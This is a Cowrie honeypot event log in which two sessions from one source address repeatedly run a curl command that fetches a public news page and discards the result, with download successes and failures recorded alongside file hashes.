{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.118530Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.122383Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.123265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.125254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.126822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.157370Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.168200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.169218Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.171200Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.172614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.176136Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.206559Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.223544Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.227909Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.228902Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.231501Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.232455Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.260391Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.262717Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.276288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.277261Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.279479Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.281140Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.293566Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.315372Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.316686Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.352687Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.355152Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.393701Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.396136Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.426265Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.437791Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.439720Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.468612Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.469906Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.473807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.474780Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.477056Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.480981Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.516595Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.518741Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.522046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.522993Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.525297Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.526160Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.554177Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.555799Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.569680Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.570846Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.574549Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.575474Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.591041Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.592522Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.607722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.608876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.616913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.618228Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.630199Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.631623Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.653013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.654132Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.666136Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.667642Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.668566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.670215Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.703084Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.703786Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.707200Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.709072Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.712587Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.740835Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.742011Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.743629Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.779102Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.780437Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.783345Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.785070Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.798009Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.799055Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.820642Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.822314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.823343Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.825606Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.835833Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.837286Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.866224Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.867452Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.879150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.880311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.905829Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.907633Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.916684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.917952Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.930062Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.931299Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.940992Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.941675Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.942783Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.956392Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.976918Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.978442Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:58.989363Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:58.990561Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.003322Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.004445Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.010209Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.019247Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.033600Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.034950Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.039767Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.053605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.054634Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.069416Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.071495Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.074253Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.079273Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
